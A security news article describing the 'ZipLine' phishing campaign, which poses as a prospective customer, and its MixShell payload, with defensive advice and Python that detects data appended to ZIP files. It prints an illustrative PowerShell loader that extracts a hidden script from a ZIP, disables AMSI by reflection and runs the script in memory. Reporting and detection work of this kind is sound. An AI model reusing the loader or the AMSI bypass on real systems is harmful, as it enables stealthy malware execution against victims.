Check Point warns of phishing campaign that emulates potential customers and a vendor evaluation process
Take action: Now is the time to be suspicious of any "potential customers" who contact you out of the blue. Verify their provenance through multiple channels, such as corporate registrations, phone calls to numbers taken from official directories, and business forums. Finally, BE VERY SUSPICIOUS of ZIP files used to deliver documents.
Learn More
Check Point Research is reporting a social engineering campaign dubbed "ZipLine" that employs "long con" phishing tactics. The campaign is very patient and can last for several weeks.
Unlike traditional phishing, where the attackers send the first email, in this technique they submit the target's official Contact form and pose as a potential customer. Trust building is therefore implicit, since the email conversation is initiated by the victim company itself.
Attackers are using domains that were originally registered between 2015 and 2019, long before the ZipLine campaign began, buying abandoned or dormant domains with legitimate business histories to significantly increase their chances of bypassing security filters.
After the initial response, attackers engage in credible, professional email conversations that can span up to two weeks before delivering malicious payloads. During these extended interactions, the threat actors behave like a corporation, delaying replies because they are "too busy" and asking for Non-Disclosure Agreements (NDAs).
The malicious payload is delivered as a ZIP file shared on a trusted, well-known file sharing platform (to avoid antivirus scanners as much as possible).
The ZIP contains the NDA PDF and DOCX, which are legitimate files, but also a .lnk file designed to download an initial malicious script that runs the attack. The user, not wanting to miss anything, opens all of the attached files, executing the LNK file.
The LNK file can be configured to execute a Windows PowerShell command like this (not real code):
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
    $folders = @('$env:USERPROFILE\Desktop', '$env:USERPROFILE\Downloads', '$env:USERPROFILE\Documents', '$env:TEMP', '$env:ProgramData', '..');
    $zipFound = $null;
    foreach($folder in $folders) {
        $zipFiles = Get-ChildItem -Path $folder -Filter '*.zip' -ErrorAction SilentlyContinue;
        foreach($zip in $zipFiles) {
            $content = [System.IO.File]::ReadAllBytes($zip.FullName);
            $marker = [System.Text.Encoding]::ASCII.GetBytes('xFIQCV');
            if([System.Text.Encoding]::ASCII.GetString($content).Contains('xFIQCV')) {
                $zipFound = $zip.FullName; break;
            }
        }
        if($zipFound) { break; }
    }
    if($zipFound) {
        $bytes = [System.IO.File]::ReadAllBytes($zipFound);
        $markerIndex = [System.Text.Encoding]::ASCII.GetString($bytes).IndexOf('xFIQCV') + 6;
        $script = [System.Text.Encoding]::ASCII.GetString($bytes[$markerIndex..($bytes.Length-1)]);
        Copy-Item $zipFound '$env:ProgramData\temp_docs.zip';
        Expand-Archive '$env:ProgramData\temp_docs.zip' '$env:ProgramData\extracted';
        Start-Process '$env:ProgramData\extracted\document.docx';
        [System.Management.Automation.AmsiUtils].GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);
        $cleanScript = $script.Replace('#','');
        Invoke-Expression $cleanScript;
    }"
More interesting still, the real malicious code is hidden in the ZIP file as a seemingly useless addition appended to the file; the program launched from the LNK file looks for that addition, extracts it and runs it.
The ZipLine campaign primarily focuses on U.S.-based entities in industrial manufacturing, including machinery, metalwork, component production, and engineered systems, as well as companies in hardware and semiconductors, consumer goods and services, and biotech and pharmaceuticals.
The attackers have also targeted organizations in Switzerland, Japan, and Singapore, demonstrating the campaign's international scope while maintaining its focus on critical supply chain infrastructure.
Recently, Check Point Research observed a new wave of ZipLine phishing emails centered around an "AI transformation" pretext, where attackers claim to be evaluating how the victim company uses AI. These emails are framed as AI Impact Assessments, which are quite common these days. Attackers have requested that company leadership respond to those files, trying to imply importance but also hoping to get onto the computers of top management.
All the fake websites are completely fabricated, sharing identical content, layout, and structure cloned from a single template. Interestingly, the "About Us" pages across all domains display the same photograph purporting to be company founders, which is actually a stock image of White House butlers.

The malicious payload delivered through ZipLine is a custom in-memory implant called "MixShell," which demonstrates advanced evasion and persistence capabilities. The malware is embedded within ZIP archives as PowerShell scripts positioned after specific marker strings, allowing the malware to extract and execute in memory without dropping files to disk.
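The hiding trick described in the LNK section above and summarized again here, script bytes appended after a marker string beyond the end of the ZIP structure, is invisible to archive tools but easy to check for: anything after the End of Central Directory (EOCD) record is not part of the archive. The following Python is an added defender-side example, not code from Check Point's report; the marker string xFIQCV is the one quoted in the article, while the sample archive, its member names and the trailer are constructed here.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"      # End of Central Directory record signature
EOCD_LEN = 22                 # fixed part of the EOCD record
MARKER = b"xFIQCV"            # marker string quoted in the article
# Constructed sample trailer: marker followed by a harmless '#'-padded stub.
TRAILER = MARKER + b"# constructed trailing script, not a real payload #"

def find_eocd(data: bytes) -> int:
    """Offset of the real EOCD record, or -1. A candidate counts only if the
    central directory ends exactly where it begins, so a stray signature
    inside file contents or appended bytes is not mistaken for the end."""
    pos = 0
    while True:
        idx = data.find(EOCD_SIG, pos)
        if idx < 0 or idx + EOCD_LEN > len(data):
            return -1
        cd_size, cd_offset, _comment_len = struct.unpack_from("<IIH", data, idx + 12)
        if cd_offset + cd_size == idx:
            return idx
        pos = idx + 1

def inspect_zip(data: bytes) -> dict:
    """Report bytes appended after the archive and any .lnk members inside it."""
    eocd = find_eocd(data)
    if eocd < 0:
        raise ValueError("no consistent End of Central Directory record")
    comment_len = struct.unpack_from("<H", data, eocd + 20)[0]
    archive_end = eocd + EOCD_LEN + comment_len
    trailing = data[archive_end:]
    # Parse only the genuine archive so appended bytes cannot confuse zipfile.
    with zipfile.ZipFile(io.BytesIO(data[:archive_end])) as zf:
        names = zf.namelist()
    return {
        "trailing_bytes": len(trailing),
        "known_marker": MARKER in trailing,
        "lnk_members": [n for n in names if n.lower().endswith(".lnk")],
    }

def build_sample(append_trailer: bool) -> bytes:
    """Constructed lure archive: two decoy documents plus a .lnk entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("NDA.pdf", b"%PDF-1.4 constructed placeholder")
        zf.writestr("NDA.docx", b"constructed placeholder")
        zf.writestr("NDA.pdf.lnk", b"L\x00\x00\x00 constructed placeholder")
    return buf.getvalue() + (TRAILER if append_trailer else b"")
```

Run `inspect_zip(open(path, "rb").read())` over inbound archives; a non-zero `trailing_bytes` count or any `.lnk` member is worth quarantining regardless of whether the marker matches, since the marker is trivially changed between campaigns.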
"Many dozens" of organizations have been targeted in the ongoing campaign, which dates back to the beginning of May 2025, with more than 80 percent of identified targets being U.S.-based entities.
The campaign does not discriminate based on organizational size, with both enterprise-level companies and small-to-medium businesses being affected, suggesting attackers are willing to invest significant time regardless of company size.